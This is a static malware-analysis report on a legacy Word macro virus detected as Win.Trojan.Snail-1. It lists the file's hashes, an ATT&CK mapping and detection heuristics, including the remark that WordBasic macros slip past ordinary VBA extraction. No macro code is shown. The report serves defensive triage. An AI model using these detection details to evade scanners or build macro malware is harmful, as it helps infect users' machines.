Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c908ae454dd0b988…

MALICIOUS

Office (OLE)

Size: 14.5 KB
First seen: 2012-06-14
MD5: ff2fecc1164c742bfd176996f3adce50
SHA-1: a076fc43feda50f87889eb5cd51b5b0b3c95dfe5
SHA-256: c908ae454dd0b9888767577f80ad077ff41c1659f77cedc44609c7cedd234340
Risk Score: 102

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file exhibits characteristics of a legacy macro virus, specifically identified by "RSN MACRO VIRUS" markers and a ClamAV detection of "Win.Trojan.Snail-1". The document body contains numerous VBA-like keywords and strings, indicating the presence of malicious macros. The primary purpose appears to be propagation and infection, typical of older macro viruses.

Heuristics (3)

  • ClamAV: Win.Trojan.Snail-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Snail-1
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source [info] (OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 4297 bytes
SHA-256: 6533b01096a5f1a1d8c75b8988e329fb63c7983546a1239f3976b2509525f28d
Preview script
First 1,000 lines of the extracted script